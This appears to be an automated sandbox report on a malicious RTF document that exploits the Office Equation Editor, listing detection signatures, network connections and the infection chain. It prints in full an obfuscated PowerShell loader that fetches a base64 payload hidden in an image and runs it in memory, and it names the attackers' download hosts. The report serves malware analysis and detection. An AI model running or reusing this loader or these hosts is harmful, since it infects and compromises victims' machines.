Windows Analysis Report
4YlwTsmpuZ.rtf

Overview

General Information

Sample name:	4YlwTsmpuZ.rtf renamed because original name is a hash value
Original sample name:	9904916ce3549610216e99d83e7e2135.rtf
Analysis ID:	1466761
MD5:	9904916ce3549610216e99d83e7e2135
SHA1:	d5eefab14ee9d5afa6258d3b399b46f779a56901
SHA256:	a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
Tags:	rtf
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Obfuscated command line found

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4YlwTsmpuZ.rtf

Avira: detected

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%			Perma Link
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.235.16 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035105D5 LoadLibraryW,	2_2_035105D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510696 ShellExecuteW,ExitProcess,	2_2_03510696
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03510668
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510681 ShellExecuteW,ExitProcess,	2_2_03510681
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0351050A ExitProcess,	2_2_0351050A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035106BB ExitProcess,	2_2_035106BB

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: uploaddeimagens.com.br

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49162

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.95.235.16 23.95.235.16
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.1
Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/grJ
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gif
Source: EQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifj
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifyyC:
Source: wscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.dr	String found in binary or memory: http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.359414442.0000000004F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

System Summary

Malicious sample detected (through community Yara rule)

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Yara signature match

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.expl.evad.winRTF@7/12@1/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$lwTsmpuZ.rtf

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR65F3.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
